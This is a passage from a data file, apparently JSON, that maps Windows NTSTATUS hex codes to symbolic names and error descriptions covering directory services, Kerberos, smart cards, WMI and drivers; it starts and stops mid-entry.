\"c00002ab\": {\n            \"code\": \"STATUS_DS_OBJ_CLASS_VIOLATION\",\n            \"description\": \"The requested operation did not satisfy one or more constraints that are associated with the class of the object.\"\n        },\n        \"c00002ac\": {\n            \"code\": \"STATUS_DS_CANT_ON_NON_LEAF\",\n            \"description\": \"The directory service can perform the requested operation only on a leaf object.\"\n        },\n        \"c00002ad\": {\n            \"code\": \"STATUS_DS_CANT_ON_RDN\",\n            \"description\": \"The directory service cannot perform the requested operation on the Relatively Defined Name (RDN) attribute of an object.\"\n        },\n        \"c00002ae\": {\n            \"code\": \"STATUS_DS_CANT_MOD_OBJ_CLASS\",\n            \"description\": \"The directory service detected an attempt to modify the object class of an object.\"\n        },\n        \"c00002af\": {\n            \"code\": \"STATUS_DS_CROSS_DOM_MOVE_FAILED\",\n            \"description\": \"An error occurred while performing a cross domain move operation.\"\n        },\n        \"c00002b0\": {\n            \"code\": \"STATUS_DS_GC_NOT_AVAILABLE\",\n            \"description\": \"Unable to contact the global catalog server.\"\n        },\n        \"c00002b1\": {\n            \"code\": \"STATUS_DIRECTORY_SERVICE_REQUIRED\",\n            \"description\": \"The requested operation requires a directory service, and none was available.\"\n        },\n        \"c00002b2\": {\n            \"code\": \"STATUS_REPARSE_ATTRIBUTE_CONFLICT\",\n            \"description\": \"The reparse attribute cannot be set because it is incompatible with an existing attribute.\"\n        },\n        \"c00002b3\": {\n            \"code\": \"STATUS_CANT_ENABLE_DENY_ONLY\",\n            \"description\": \"A group marked use for deny only cannot be enabled.\"\n        },\n        \"c00002b4\": {\n            \"code\": \"STATUS_FLOAT_MULTIPLE_FAULTS\",\n            \"description\": \"{EXCEPTION} Multiple floating-point faults.\"\n        },\n        \"c00002b5\": {\n            \"code\": \"STATUS_FLOAT_MULTIPLE_TRAPS\",\n            \"description\": \"{EXCEPTION} Multiple floating-point traps.\"\n        },\n        \"c00002b6\": {\n            \"code\": \"STATUS_DEVICE_REMOVED\",\n            \"description\": \"The device has been removed.\"\n        },\n        \"c00002b7\": {\n            \"code\": \"STATUS_JOURNAL_DELETE_IN_PROGRESS\",\n            \"description\": \"The volume change journal is being deleted.\"\n        },\n        \"c00002b8\": {\n            \"code\": \"STATUS_JOURNAL_NOT_ACTIVE\",\n            \"description\": \"The volume change journal is not active.\"\n        },\n        \"c00002b9\": {\n            \"code\": \"STATUS_NOINTERFACE\",\n            \"description\": \"The requested interface is not supported.\"\n        },\n        \"c00002c1\": {\n            \"code\": \"STATUS_DS_ADMIN_LIMIT_EXCEEDED\",\n            \"description\": \"A directory service resource limit has been exceeded.\"\n        },\n        \"c00002c2\": {\n            \"code\": \"STATUS_DRIVER_FAILED_SLEEP\",\n            \"description\": \"{System Standby Failed} The driver %hs does not support standby mode. Updating this driver allows the system to go to standby mode.\"\n        },\n        \"c00002c3\": {\n            \"code\": \"STATUS_MUTUAL_AUTHENTICATION_FAILED\",\n            \"description\": \"Mutual Authentication failed. The server password is out of date at the domain controller.\"\n        },\n        \"c00002c4\": {\n            \"code\": \"STATUS_CORRUPT_SYSTEM_FILE\",\n            \"description\": \"The system file %1 has become corrupt and has been replaced.\"\n        },\n        \"c00002c5\": {\n            \"code\": \"STATUS_DATATYPE_MISALIGNMENT_ERROR\",\n            \"description\": \"{EXCEPTION} Alignment Error A data type misalignment error was detected in a load or store instruction.\"\n        },\n        \"c00002c6\": {\n            \"code\": \"STATUS_WMI_READ_ONLY\",\n            \"description\": \"The WMI data item or data block is read-only.\"\n        },\n        \"c00002c7\": {\n            \"code\": \"STATUS_WMI_SET_FAILURE\",\n            \"description\": \"The WMI data item or data block could not be changed.\"\n        },\n        \"c00002c8\": {\n            \"code\": \"STATUS_COMMITMENT_MINIMUM\",\n            \"description\": \"{Virtual Memory Minimum Too Low} Your system is low on virtual memory. Windows is increasing the size of your virtual memory paging file. During this process, memory requests for some applications might be denied. For more information, see Help.\"\n        },\n        \"c00002c9\": {\n            \"code\": \"STATUS_REG_NAT_CONSUMPTION\",\n            \"description\": \"{EXCEPTION} Register NaT consumption faults. A NaT value is consumed on a non-speculative instruction.\"\n        },\n        \"c00002ca\": {\n            \"code\": \"STATUS_TRANSPORT_FULL\",\n            \"description\": \"The transport element of the medium changer contains media, which is causing the operation to fail.\"\n        },\n        \"c00002cb\": {\n            \"code\": \"STATUS_DS_SAM_INIT_FAILURE\",\n            \"description\": \"Security Accounts Manager initialization failed because of the following error: %hs Error Status: 0x%x. Click OK to shut down this system and restart in Directory Services Restore Mode. Check the event log for more detailed information.\"\n        },\n        \"c00002cc\": {\n            \"code\": \"STATUS_ONLY_IF_CONNECTED\",\n            \"description\": \"This operation is supported only when you are connected to the server.\"\n        },\n        \"c00002cd\": {\n            \"code\": \"STATUS_DS_SENSITIVE_GROUP_VIOLATION\",\n            \"description\": \"Only an administrator can modify the membership list of an administrative group.\"\n        },\n        \"c00002ce\": {\n            \"code\": \"STATUS_PNP_RESTART_ENUMERATION\",\n            \"description\": \"A device was removed so enumeration must be restarted.\"\n        },\n        \"c00002cf\": {\n            \"code\": \"STATUS_JOURNAL_ENTRY_DELETED\",\n            \"description\": \"The journal entry has been deleted from the journal.\"\n        },\n        \"c00002d0\": {\n            \"code\": \"STATUS_DS_CANT_MOD_PRIMARYGROUPID\",\n            \"description\": \"Cannot change the primary group ID of a domain controller account.\"\n        },\n        \"c00002d1\": {\n            \"code\": \"STATUS_SYSTEM_IMAGE_BAD_SIGNATURE\",\n            \"description\": \"{Fatal System Error} The system image %s is not properly signed. The file has been replaced with the signed file. The system has been shut down.\"\n        },\n        \"c00002d2\": {\n            \"code\": \"STATUS_PNP_REBOOT_REQUIRED\",\n            \"description\": \"The device will not start without a reboot.\"\n        },\n        \"c00002d3\": {\n            \"code\": \"STATUS_POWER_STATE_INVALID\",\n            \"description\": \"The power state of the current device cannot support this request.\"\n        },\n        \"c00002d4\": {\n            \"code\": \"STATUS_DS_INVALID_GROUP_TYPE\",\n            \"description\": \"The specified group type is invalid.\"\n        },\n        \"c00002d5\": {\n            \"code\": \"STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN\",\n            \"description\": \"In a mixed domain, no nesting of a global group if the group is security enabled.\"\n        },\n        \"c00002d6\": {\n            \"code\": \"STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN\",\n            \"description\": \"In a mixed domain, cannot nest local groups with other local groups, if the group is security enabled.\"\n        },\n        \"c00002d7\": {\n            \"code\": \"STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER\",\n            \"description\": \"A global group cannot have a local group as a member.\"\n        },\n        \"c00002d8\": {\n            \"code\": \"STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER\",\n            \"description\": \"A global group cannot have a universal group as a member.\"\n        },\n        \"c00002d9\": {\n            \"code\": \"STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER\",\n            \"description\": \"A universal group cannot have a local group as a member.\"\n        },\n        \"c00002da\": {\n            \"code\": \"STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER\",\n            \"description\": \"A global group cannot have a cross-domain member.\"\n        },\n        \"c00002db\": {\n            \"code\": \"STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER\",\n            \"description\": \"A local group cannot have another cross-domain local group as a member.\"\n        },\n        \"c00002dc\": {\n            \"code\": \"STATUS_DS_HAVE_PRIMARY_MEMBERS\",\n            \"description\": \"Cannot change to a security-disabled group because primary members are in this group.\"\n        },\n        \"c00002dd\": {\n            \"code\": \"STATUS_WMI_NOT_SUPPORTED\",\n            \"description\": \"The WMI operation is not supported by the data block or method.\"\n        },\n        \"c00002de\": {\n            \"code\": \"STATUS_INSUFFICIENT_POWER\",\n            \"description\": \"There is not enough power to complete the requested operation.\"\n        },\n        \"c00002df\": {\n            \"code\": \"STATUS_SAM_NEED_BOOTKEY_PASSWORD\",\n            \"description\": \"The Security Accounts Manager needs to get the boot password.\"\n        },\n        \"c00002e0\": {\n            \"code\": \"STATUS_SAM_NEED_BOOTKEY_FLOPPY\",\n            \"description\": \"The Security Accounts Manager needs to get the boot key from the floppy disk.\"\n        },\n        \"c00002e1\": {\n            \"code\": \"STATUS_DS_CANT_START\",\n            \"description\": \"The directory service cannot start.\"\n        },\n        \"c00002e2\": {\n            \"code\": \"STATUS_DS_INIT_FAILURE\",\n            \"description\": \"The directory service could not start because of the following error: %hs Error Status: 0x%x. Click OK to shut down this system and restart in Directory Services Restore Mode. Check the event log for more detailed information.\"\n        },\n        \"c00002e3\": {\n            \"code\": \"STATUS_SAM_INIT_FAILURE\",\n            \"description\": \"The Security Accounts Manager initialization failed because of the following error: %hs Error Status: 0x%x. Click OK to shut down this system and restart in Safe Mode. Check the event log for more detailed information.\"\n        },\n        \"c00002e4\": {\n            \"code\": \"STATUS_DS_GC_REQUIRED\",\n            \"description\": \"The requested operation can be performed only on a global catalog server.\"\n        },\n        \"c00002e5\": {\n            \"code\": \"STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY\",\n            \"description\": \"A local group can only be a member of other local groups in the same domain.\"\n        },\n        \"c00002e6\": {\n            \"code\": \"STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS\",\n            \"description\": \"Foreign security principals cannot be members of universal groups.\"\n        },\n        \"c00002e7\": {\n            \"code\": \"STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED\",\n            \"description\": \"Your computer could not be joined to the domain. You have exceeded the maximum number of computer accounts you are allowed to create in this domain. Contact your system administrator to have this limit reset or increased.\"\n        },\n        \"c00002e9\": {\n            \"code\": \"STATUS_CURRENT_DOMAIN_NOT_ALLOWED\",\n            \"description\": \"This operation cannot be performed on the current domain.\"\n        },\n        \"c00002ea\": {\n            \"code\": \"STATUS_CANNOT_MAKE\",\n            \"description\": \"The directory or file cannot be created.\"\n        },\n        \"c00002eb\": {\n            \"code\": \"STATUS_SYSTEM_SHUTDOWN\",\n            \"description\": \"The system is in the process of shutting down.\"\n        },\n        \"c00002ec\": {\n            \"code\": \"STATUS_DS_INIT_FAILURE_CONSOLE\",\n            \"description\": \"Directory Services could not start because of the following error: %hs Error Status: 0x%x. Click OK to shut down the system. You can use the recovery console to diagnose the system further.\"\n        },\n        \"c00002ed\": {\n            \"code\": \"STATUS_DS_SAM_INIT_FAILURE_CONSOLE\",\n            \"description\": \"Security Accounts Manager initialization failed because of the following error: %hs Error Status: 0x%x. Click OK to shut down the system. You can use the recovery console to diagnose the system further.\"\n        },\n        \"c00002ee\": {\n            \"code\": \"STATUS_UNFINISHED_CONTEXT_DELETED\",\n            \"description\": \"A security context was deleted before the context was completed. This is considered a logon failure.\"\n        },\n        \"c00002ef\": {\n            \"code\": \"STATUS_NO_TGT_REPLY\",\n            \"description\": \"The client is trying to negotiate a context and the server requires user-to-user but did not send a TGT reply.\"\n        },\n        \"c00002f0\": {\n            \"code\": \"STATUS_OBJECTID_NOT_FOUND\",\n            \"description\": \"An object ID was not found in the file.\"\n        },\n        \"c00002f1\": {\n            \"code\": \"STATUS_NO_IP_ADDRESSES\",\n            \"description\": \"Unable to accomplish the requested task because the local machine does not have any IP addresses.\"\n        },\n        \"c00002f2\": {\n            \"code\": \"STATUS_WRONG_CREDENTIAL_HANDLE\",\n            \"description\": \"The supplied credential handle does not match the credential that is associated with the security context.\"\n        },\n        \"c00002f3\": {\n            \"code\": \"STATUS_CRYPTO_SYSTEM_INVALID\",\n            \"description\": \"The crypto system or checksum function is invalid because a required function is unavailable.\"\n        },\n        \"c00002f4\": {\n            \"code\": \"STATUS_MAX_REFERRALS_EXCEEDED\",\n            \"description\": \"The number of maximum ticket referrals has been exceeded.\"\n        },\n        \"c00002f5\": {\n            \"code\": \"STATUS_MUST_BE_KDC\",\n            \"description\": \"The local machine must be a Kerberos KDC (domain controller) and it is not.\"\n        },\n        \"c00002f6\": {\n            \"code\": \"STATUS_STRONG_CRYPTO_NOT_SUPPORTED\",\n            \"description\": \"The other end of the security negotiation requires strong crypto but it is not supported on the local machine.\"\n        },\n        \"c00002f7\": {\n            \"code\": \"STATUS_TOO_MANY_PRINCIPALS\",\n            \"description\": \"The KDC reply contained more than one principal name.\"\n        },\n        \"c00002f8\": {\n            \"code\": \"STATUS_NO_PA_DATA\",\n            \"description\": \"Expected to find PA data for a hint of what etype to use, but it was not found.\"\n        },\n        \"c00002f9\": {\n            \"code\": \"STATUS_PKINIT_NAME_MISMATCH\",\n            \"description\": \"The client certificate does not contain a valid UPN, or does not match the client name in the logon request. Contact your administrator.\"\n        },\n        \"c00002fa\": {\n            \"code\": \"STATUS_SMARTCARD_LOGON_REQUIRED\",\n            \"description\": \"Smart card logon is required and was not used.\"\n        },\n        \"c00002fb\": {\n            \"code\": \"STATUS_KDC_INVALID_REQUEST\",\n            \"description\": \"An invalid request was sent to the KDC.\"\n        },\n        \"c00002fc\": {\n            \"code\": \"STATUS_KDC_UNABLE_TO_REFER\",\n            \"description\": \"The KDC was unable to generate a referral for the service requested.\"\n        },\n        \"c00002fd\": {\n            \"code\": \"STATUS_KDC_UNKNOWN_ETYPE\",\n            \"description\": \"The encryption type requested is not supported by the KDC.\"\n        },\n        \"c00002fe\": {\n            \"code\": \"STATUS_SHUTDOWN_IN_PROGRESS\",\n            \"description\": \"A system shutdown is in progress.\"\n        },\n        \"c00002ff\": {\n            \"code\": \"STATUS_SERVER_SHUTDOWN_IN_PROGRESS\",\n            \"description\": \"The server machine is shutting down.\"\n        },\n        \"c0000300\": {\n            \"code\": \"STATUS_NOT_SUPPORTED_ON_SBS\",\n            \"description\": \"This operation is not supported on a computer running Windows Server 2003 operating system for Small Business Server.\"\n        },\n        \"c0000301\": {\n            \"code\": \"STATUS_WMI_GUID_DISCONNECTED\",\n            \"description\": \"The WMI GUID is no longer available.\"\n        },\n        \"c0000302\": {\n            \"code\": \"STATUS_WMI_ALREADY_DISABLED\",\n            \"description\": \"Collection or events for the WMI GUID is already disabled.\"\n        },\n        \"c0000303\": {\n            \"code\": \"STATUS_WMI_ALREADY_ENABLED\",\n            \"description\": \"Collection or events for the WMI GUID is already enabled.\"\n        },\n        \"c0000304\": {\n            \"code\": \"STATUS_MFT_TOO_FRAGMENTED\",\n            \"description\": \"The master file table on the volume is too fragmented to complete this operation.\"\n        },\n        \"c0000305\": {\n            \"code\": \"STATUS_COPY_PROTECTION_FAILURE\",\n            \"description\": \"Copy protection failure.\"\n        },\n        \"c0000306\": {\n            \"code\": \"STATUS_CSS_AUTHENTICATION_FAILURE\",\n            \"description\": \"Copy protection error—DVD CSS Authentication failed.\"\n        },\n        \"c0000307\": {\n            \"code\": \"STATUS_CSS_KEY_NOT_PRESENT\",\n            \"description\": \"Copy protection error—The specified sector does not contain a valid key.\"\n        },\n        \"c0000308\": {\n            \"code\": \"STATUS_CSS_KEY_NOT_ESTABLISHED\",\n            \"description\": \"Copy protection error—DVD session key not established.\"\n        },\n        \"c0000309\": {\n            \"code\": \"STATUS_CSS_SCRAMBLED_SECTOR\",\n            \"description\": \"Copy protection error—The read failed because the sector is encrypted.\"\n        },\n        \"c000030a\": {\n            \"code\": \"STATUS_CSS_REGION_MISMATCH\",\n            \"description\": \"Copy protection error—The region of the specified DVD does not correspond to the region setting of the drive.\"\n        },\n        \"c000030b\": {\n            \"code\": \"STATUS_CSS_RESETS_EXHAUSTED\",\n            \"description\": \"Copy protection error—The region setting of the drive might be permanent.\"\n        },\n        \"c0000320\": {\n            \"code\": \"STATUS_PKINIT_FAILURE\",\n            \"description\": \"The Kerberos protocol encountered an error while validating the KDC certificate during smart card logon. There is more information in the system event log.\"\n        },\n        \"c0000321\": {\n            \"code\": \"STATUS_SMARTCARD_SUBSYSTEM_FAILURE\",\n            \"description\": \"The Kerberos protocol encountered an error while attempting to use the smart card subsystem.\"\n        },\n        \"c0000322\": {\n            \"code\": \"STATUS_NO_KERB_KEY\",\n            \"description\": \"The target server does not have acceptable Kerberos credentials.\"\n        },\n        \"c0000350\": {\n            \"code\": \"STATUS_HOST_DOWN\",\n            \"description\": \"The transport determined that the remote system is down.\"\n        },\n        \"c0000351\": {\n            \"code\": \"STATUS_UNSUPPORTED_PREAUTH\",\n            \"description\": \"An unsupported pre-authentication mechanism was presented to the Kerberos package.\"\n        },\n        \"c0000352\": {\n            \"code\": \"STATUS_EFS_ALG_BLOB_TOO_BIG\",\n            \"description\": \"The encryption algorithm that is used on the source file needs a bigger key buffer than the one that is used on the destination file.\"\n        },\n        \"c0000353\": {\n            \"code\": \"STATUS_PORT_NOT_SET\",\n            \"description\": \"An attempt to remove a processes DebugPort was made, but a port was not already associated with the process.\"\n        },\n        \"c0000354\": {\n            \"code\": \"STATUS_DEBUGGER_INACTIVE\",\n            \"description\": \"An attempt to do an operation on a debug port failed because the port is in the process of being deleted.\"\n        },\n        \"c0000355\": {\n            \"code\": \"STATUS_DS_VERSION_CHECK_FAILURE\",\n            \"description\": \"This version of Windows is not compatible with the behavior version of the directory forest, domain, or domain controller.\"\n        },\n        \"c0000356\": {\n            \"code\": \"STATUS_AUDITING_DISABLED\",\n            \"description\": \"The specified event is currently not being audited.\"\n        },\n        \"c0000357\": {\n            \"code\": \"STATUS_PRENT4_MACHINE_ACCOUNT\",\n            \"description\": \"The machine account was created prior to Windows NT 4.0 operating system. The account needs to be recreated.\"\n        },\n        \"c0000358\": {\n            \"code\": \"STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER\",\n            \"description\": \"An account group cannot have a universal group as a member.\"\n        },\n        \"c0000359\": {\n            \"code\": \"STATUS_INVALID_IMAGE_WIN_32\",\n            \"description\": \"The specified image file did not have the correct format; it appears to be a 32-bit Windows image.\"\n        },\n        \"c000035a\": {\n            \"code\": \"STATUS_INVALID_IMAGE_WIN_64\",\n            \"description\": \"The specified image file did not have the correct format; it appears to be a 64-bit Windows image.\"\n        },\n        \"c000035b\": {\n            \"code\": \"STATUS_BAD_BINDINGS\",\n            \"description\": \"The client's supplied SSPI channel bindings were incorrect.\"\n        },\n        \"c000035c\": {\n            \"code\": \"STATUS_NETWORK_SESSION_EXPIRED\",\n            \"description\": \"The client session has expired; so the client must re-authenticate to continue accessing the remote resources.\"\n        },\n        \"c000035d\": {\n            \"code\": \"STATUS_APPHELP_BLOCK\",\n            \"description\": \"The AppHelp dialog box canceled; thus preventing the application from starting.\"\n        },\n        \"c000035e\": {\n            \"code\": \"STATUS_ALL_SIDS_FILTERED\",\n            \"description\": \"The SID filtering operation removed all SIDs.\"\n        },\n        \"c000035f\": {\n            \"code\": \"STATUS_NOT_SAFE_MODE_DRIVER\",\n            \"description\": \"The driver was not loaded because the system is starting in safe mode.\"\n        },\n        \"c0000361\": {\n            \"code\": \"STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT\",\n            \"description\": \"Access to %1 has been restricted by your Administrator by the default software restriction policy level.\"\n        },\n        \"c0000362\": {\n            \"code\": \"STATUS_ACCESS_DISABLED_BY_POLICY_PATH\",\n            \"description\": \"Access to %1 has been restricted by your Administrator by location with policy rule %2 placed on path %3.\"\n        },\n        \"c0000363\": {\n            \"code\": \"STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER\",\n            \"description\": \"Access to %1 has been restricted by your Administrator by software publisher policy.\"\n        },\n        \"c0000364\": {\n            \"code\": \"STATUS_ACCESS_DISABLED_BY_POLICY_OTHER\",\n            \"description\": \"Access to %1 has been restricted by your Administrator by policy rule %2.\"\n        },\n        \"c0000365\": {\n            \"code\": \"STATUS_FAILED_DRIVER_ENTRY\",\n            \"description\": \"The driver was not loaded because it failed its initialization call.\"\n        },\n        \"c0000366\": {\n            \"code\": \"STATUS_DEVICE_ENUMERATION_ERROR\",\n            \"description\": \"The device encountered an error while applying power or reading the device configuration. This might be caused by a failure of your hardware or by a poor connection.\"\n        },\n        \"c0000368\": {\n            \"code\": \"STATUS_MOUNT_POINT_NOT_RESOLVED\",\n            \"description\": \"The create operation failed because the name contained at least one mount point that resolves to a volume to which the specified device object is not attached.\"\n        },\n        \"c0000369\": {\n            \"code\": \"STATUS_INVALID_DEVICE_OBJECT_PARAMETER\",\n            \"description\": \"The device object parameter is either not a valid device object or is not attached to the volume that is specified by the file name.\"\n        },\n        \"c000036a\": {\n            \"code\": \"STATUS_MCA_OCCURED\",\n            \"description\": \"A machine check error has occurred. Check the system event log for additional information.\"\n        },\n        \"c000036b\": {\n            \"code\": \"STATUS_DRIVER_BLOCKED_CRITICAL\",\n            \"description\": \"Driver %2 has been blocked from loading.\"\n        },\n        \"c000036c\": {\n            \"code\": \"STATUS_DRIVER_BLOCKED\",\n            \"description\": \"Driver %2 has been blocked from loading.\"\n        },\n        \"c000036d\": {\n            \"code\": \"STATUS_DRIVER_DATABASE_ERROR\",\n            \"description\": \"There was error [%2] processing the driver database.\"\n        },\n        \"c000036e\": {\n            \"code\": \"STATUS_SYSTEM_HIVE_TOO_LARGE\",\n            \"description\": \"System hive size has exceeded its limit.\"\n        },\n        \"c000036f\": {\n            \"code\": \"STATUS_INVALID_IMPORT_OF_NON_DLL\",\n            \"description\": \"A dynamic link library (DLL) referenced a module that was neither a DLL nor the process's executable image.\"\n        },\n        \"c0000371\": {\n            \"code\": \"STATUS_NO_SECRETS\",\n            \"description\": \"The local account store does not contain secret material for the specified account.\"\n        },\n        \"c0000372\": {\n            \"code\": \"STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY\",\n            \"description\": \"Access to %1 has been restricted by your Administrator by policy rule %2.\"\n        },\n        \"c0000373\": {\n            \"code\": \"STATUS_FAILED_STACK_SWITCH\",\n            \"description\": \"The system was not able to allocate enough memory to perform a stack switch.\"\n        },\n        \"c0000374\": {\n            \"code\": \"STATUS_HEAP_CORRUPTION\",\n            \"description\": \"A heap has been corrupted.\"\n        },\n        \"c0000380\": {\n            \"code\": \"STATUS_SMARTCARD_WRONG_PIN\",\n            \"description\": \"An incorrect PIN was presented to the smart card.\"\n        },\n        \"c0000381\": {\n            \"code\": \"STATUS_SMARTCARD_CARD_BLOCKED\",\n            \"description\": \"The smart card is blocked.\"\n        },\n        \"c0000382\": {\n            \"code\": \"STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED\",\n            \"description\": \"No PIN was presented to the smart card.\"\n        },\n        \"c0000383\": {\n            \"code\": \"STATUS_SMARTCARD_NO_CARD\",\n            \"description\": \"No smart card is available.\"\n        },\n        \"c0000384\": {\n            \"code\": \"STATUS_SMARTCARD_NO_KEY_CONTAINER\",\n            \"description\": \"The requested key container does not exist on the smart card.\"\n        },\n        \"c0000385\": {\n            \"code\": \"STATUS_SMARTCARD_NO_CERTIFICATE\",\n            \"description\": \"The requested certificate does not exist on the smart card.\"\n        },\n        \"c0000386\": {\n            \"code\": \"STATUS_SMARTCARD_NO_KEYSET\",\n            \"description\": \"The requested keyset does not exist.\"\n        },\n        \"c0000387\": {\n            \"code\": \"STATUS_SMARTCARD_IO_ERROR\",\n            \"description\": \"A communication error with the smart card has been detected.\"\n        },\n        \"c0000388\": {\n            \"code\": \"STATUS_DOWNGRADE_DETECTED\",\n            \"description\": \"The system detected a possible attempt to compromise security. Ensure that you can contact the server that authenticated you.\"\n        },\n        \"c0000389\": {\n            \"code\": \"STATUS_SMARTCARD_CERT_REVOKED\",\n            \"description\": \"The smart card certificate used for authentication has been revoked. Contact your system administrator. There might be additional information in the event log.\"\n        },\n        \"c000038a\": {\n            \"code\": \"STATUS_ISSUING_CA_UNTRUSTED\",\n            \"description\": \"An untrusted certificate authority was detected while processing the smart card certificate that is used for authentication. Contact your system administrator.\"\n        },\n        \"c000038b\": {\n            \"code\": \"STATUS_REVOCATION_OFFLINE_C\",\n            \"description\": \"The revocation status of the smart card certificate that is used for authentication could not be determined. Contact your system administrator.\"\n        },\n        \"c000038c\": {\n            \"code\": \"STATUS_PKINIT_CLIENT_FAILURE\",\n            \"description\": \"The smart card certificate used for authentication was not trusted. Contact your system administrator.\"\n        },\n        \"c000038d\": {\n            \"code\": \"STATUS_SMARTCARD_CERT_EXPIRED\",\n            \"description\": \"The smart card certificate used for authentication has expired. Contact your system administrator.\"\n        },\n        \"c000038e\": {\n            \"code\": \"STATUS_DRIVER_FAILED_PRIOR_UNLOAD\",\n            \"description\": \"The driver could not be loaded because a previous version of the driver is still in memory.\"\n        },\n        \"c000038f\": {\n            \"code\": \"STATUS_SMARTCARD_SILENT_CONTEXT\",\n            \"description\": \"The smart card provider could not perform the action because the context was acquired as silent.\"\n        },\n        \"c0000401\": {\n            \"code\": \"STATUS_PER_USER_TRUST_QUOTA_EXCEEDED\",\n            \"description\": \"The delegated trust creation quota of the current user has been exceeded.\"\n        },\n        \"c0000402\": {\n            \"code\": \"STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED\",\n            \"description\": \"The total delegated trust creation quota has been exceeded.\"\n        },\n        \"c0000403\": {\n            \"code\": \"STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED\",\n            \"description\": \"The delegated trust deletion quota of the current user has been exceeded.\"\n        },\n        \"c0000404\": {\n            \"code\": \"STATUS_DS_NAME_NOT_UNIQUE\",\n            \"description\": \"The requested name already exists as a unique identifier.\"\n        },\n        \"c0000405\": {\n            \"code\": \"STATUS_DS_DUPLICATE_ID_FOUND\",\n            \"description\": \"The requested object has a non-unique identifier and cannot be retrieved.\"\n        },\n        \"c0000406\": {\n            \"code\": \"STATUS_DS_GROUP_CONVERSION_ERROR\",\n            \"description\": \"The group cannot be converted due to attribute restrictions on the requested group type.\"\n        },\n        \"c0000407\": {\n            \"code\": \"STATUS_VOLSNAP_PREPARE_HIBERNATE\",\n            \"description\": \"{Volume Shadow Copy Service} Wait while the Volume Shadow Copy Service prepares volume %hs for hibernation.\"\n        },\n        \"c0000408\": {\n            \"code\": \"STATUS_USER2USER_REQUIRED\",\n            \"description\": \"Kerberos sub-protocol User2User is required.\"\n        },\n        \"c0000409\": {\n            \"code\": \"STATUS_STACK_BUFFER_OVERRUN\",\n            \"description\": \"The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.\"\n        },\n        \"c000040a\": {\n            \"code\": \"STATUS_NO_S4U_PROT_SUPPORT\",\n            \"description\": \"The Kerberos subsystem encountered an error. A service for user protocol request was made against a domain controller which does not support service for user.\"\n        },\n        \"c000040b\": {\n            \"code\": \"STATUS_CROSSREALM_DELEGATION_FAILURE\",\n            \"description\": \"An attempt was made by this server to make a Kerberos constrained delegation request for a target that is outside the server realm. This action is not supported and the resulting error indicates a misconfiguration on the allowed-to-delegate-to list for this server. Contact your administrator.\"\n        },\n        \"c000040c\": {\n            \"code\": \"STATUS_REVOCATION_OFFLINE_KDC\",\n            \"description\": \"The revocation status of the domain controller certificate used for smart card authentication could not be determined. There is additional information in the system event log. Contact your system administrator.\"\n        },\n        \"c000040d\": {\n            \"code\": \"STATUS_ISSUING_CA_UNTRUSTED_KDC\",\n            \"description\": \"An untrusted certificate authority was detected while processing the domain controller certificate used for authentication. There is additional information in the system event log. Contact your system administrator.\"\n        },\n        \"c000040e\": {\n            \"code\": \"STATUS_KDC_CERT_EXPIRED\",\n            \"description\": \"The domain controller certificate used for smart card logon has expired. Contact your system administrator with the contents of your system event log.\"\n        },\n        \"c000040f\": {\n            \"code\": \"STATUS_KDC_CERT_REVOKED\",\n            \"description\": \"The domain controller certificate used for smart card logon has been revoked. Contact your system administrator with the contents of your system event log.\"\n        },\n        \"c0000410\": {\n            \"code\": \"STATUS_PARAMETER_QUOTA_EXCEEDED\",\n            \"description\": \"Data present in one of the parameters is more than the function can operate on.\"\n        },\n        \"c0000411\": {\n            \"code\": \"STATUS_HIBERNATION_FAILURE\",\n            \"description\": \"The system has failed to hibernate (The error code is %hs). Hibernation will be disabled until the system is restarted.\"\n        },\n        \"c0000412\": {\n            \"code\": \"STATUS_DELAY_LOAD_FAILED\",\n            \"description\": \"An attempt to delay-load a .dll or get a function address in a delay-loaded .dll failed.\"\n        },\n        \"c0000413\": {\n            \"code\": \"STATUS_AUTHENTICATION_FIREWALL_FAILED\",\n            \"description\": \"Logon Failure: The machine you are logging onto is protected by an authentication firewall. The specified account is not allowed to authenticate to the machine.\"\n        },\n        \"c0000414\": {\n            \"code\": \"STATUS_VDM_DISALLOWED\",\n            \"description\": \"%hs is a 16-bit application. You do not have permissions to execute 16-bit applications. Check your permissions with your system administrator.\"\n        },\n        \"c0000415\": {\n            \"code\": \"STATUS_HUNG_DISPLAY_DRIVER_THREAD\",\n            \"description\": \"{Display Driver Stopped Responding} The %hs display driver has stopped working normally. Save your work and reboot the system to restore full display functionality. The next time you reboot the machine a dialog will be displayed giving you a chance to report this failure to Microsoft.\"\n        },\n        \"c0000416\": {\n            \"code\": \"STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE\",\n            \"description\": \"The Desktop heap encountered an error while allocating session memory. There is more information in the system event log.\"\n        },\n        \"c0000417\": {\n            \"code\": \"STATUS_INVALID_CRUNTIME_PARAMETER\",\n            \"description\": \"An invalid parameter was passed to a C runtime function.\"\n        },\n        \"c0000418\": {\n            \"code\": \"STATUS_NTLM_BLOCKED\",\n            \"description\": \"The authentication failed because NTLM was blocked.\"\n        },\n        \"c0000419\": {\n            \"code\": \"STATUS_DS_SRC_SID_EXISTS_IN_FOREST\",\n            \"description\": \"The source object's SID already exists in destination forest.\"\n        },\n        \"c000041a\": {\n            \"code\": \"STATUS_DS_DOMAIN_NAME_EXISTS_IN_FOREST\",\n            \"description\": \"The domain name of the trusted domain already exists in the forest.\"\n        },\n        \"c000041b\": {\n            \"code\": \"STATUS_DS_FLAT_NAME_EXISTS_IN_FOREST\",\n            \"description\": \"The flat name of the trusted domain already exists in the 